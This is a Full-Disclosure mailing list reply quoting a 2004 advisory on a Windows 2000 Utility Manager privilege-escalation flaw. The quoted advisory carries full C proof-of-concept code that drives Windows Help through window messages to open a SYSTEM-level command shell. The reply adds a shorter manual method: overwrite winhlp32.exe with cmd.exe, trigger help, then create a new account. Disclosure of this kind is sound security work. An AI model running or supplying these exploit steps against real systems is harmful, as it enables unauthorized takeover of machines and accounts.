Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

[natch <lists@xxxxxxxxx>]

Nice, but the faster method is to copy \winnt\system32\cmd.exe to 
\winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1. 
When the command prompt comes up it has elevated privileges. From there 
you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a 
new account.

No external program needed. The microsoft patch simply removes the 
contextual help.

-
natch

Vivek Rathod (Application Security, Inc.) wrote:

> Microsoft Windows Utility Manager Vulnerability
>
> April 13, 2004
>
> Risk Level: High
>
> Summary:
> A local elevation of privileges vulnerability exists on the Windows 
> Utility
> Manager that allows to any user to take complete control over the 
> operating
> system.
>
> Versions Affected:
> All products in the Windows 2000 operating system family.
>
> Details:
> Microsoft Windows 2000 contains support for Accessibility options 
> within the
> operating system. Accessibility support is a series of assistive 
> technologies
> within Windows that allow users with disabilities to still be able to 
> access the
> functions of the operating system. Accessibility support is enabled or 
> disabled
> through shortcuts built into the operating system, or through the 
> Accessibility
> Utility Manager. The Utility Manager is an accessibility utility that 
> allows
> users to check the status of Accessibility programs (Magnifier, 
> Narrator, On-
> Screen Keyboard) and start or stop them. The Utility Manager can be 
> invoked by
> pressing Windows Key + U or executing "utilman.exe /start" from the 
> command
> line. The Utility Manager Service is enabled by default and runs in the
> interactive desktop with Local System privileges.
>
> The Utility Manager has support for context sensitive help. Users can 
> access
> this by clicking in the "?" on the title bar and then on an object or by
> pressing the F1 key after selecting an object. In order to display the 
> help,
> Utility Manager loads winhlp32.exe but does not drop System privileges.
> Therefore, winhlp32.exe is executed under the Local System account. While
> winhlp32.exe is executing it is possible to send Windows messages to 
> it and
> attack it with "Shatter" style attacks.
>
> Winhlp32.exe is executed with its main window hidden but it is very 
> trivial to
> make it visible. Once the window is made visible, a typical attack would
> involve using the “File Open” dialog to execute a program such as 
> “cmd.exe.”
> Since the Help window has Local System privileges, the executed 
> program will
> have the same privileges.
>
> Further information is available at:
> http://www.appsecinc.com/resources/alerts/general/04-0001.html
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
> http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
>
> Fix:
> http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en 
>
>
> Acknowledgments:
> Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application 
> Security, Inc. (http://www.appsecinc.com) and to
> Brett Moore of Security-Assessment.com (http://security-assessment.com).
>
> Please find the proof-of-concept exploit code attached
>
> ___________________________________________
> AppSecInc Team SHATTER
> Tel: 1-866-927-7732
> E-mail: shatter@xxxxxxxxxxxxx
> Web: www.appsecinc.com
>
> Application Security, Inc.
> "Securing Business by Securing Enterprise Applications"
>
> ------------------------------------------------------------------------
>
> // By Cesar Cerrudo (cesar@xxxxxxxxxxxxx)
> // Local elevation of priviliges exploit for Windows Utility Manager
> // Gives you a shell with system privileges
> // If you have problems try changing Sleep() values.
>
> #include <stdio.h> #include <windows.h> #include <commctrl.h>
> #include <Winuser.h>
>
> int main(int argc, char *argv[]) { HWND lHandle, lHandle2;
> POINT point;
>
> char sText[]="%windir%\\system32\\cmd.ex?";
>
> // run utility manager
> system("utilman.exe /start");
> Sleep(500);
>
> // execute contextual help
> SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
> Sleep(500);
>
> // open file open dialog windown in Windows Help
> PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
> Sleep(500);
>
> // find open file dialog window
> lHandle = FindWindow("#32770","Open");
>
> // get input box handle
> lHandle2 = GetDlgItem(lHandle, 0x47C);
> Sleep(500);
>
> // set text to filter listview to display only cmd.exe
> SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
> Sleep(800);
>
> // send return
> SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
>
> //get navigation bar handle
> lHandle2 = GetDlgItem(lHandle, 0x4A0);
> //send tab
> SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
> Sleep(500);
> lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
> //get list view handle
> lHandle2 = GetDlgItem(lHandle2, 0x1);
>
> SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
> SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
> SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
> Sleep(500);
>
> // popup context menu
> PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
> Sleep(1000);
>
> // get context menu handle
> point.x =10; point.y =30;
> lHandle2=WindowFromPoint(point);
>
> SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
> SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
> SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
>
> SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
>
> return(0);
> }

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html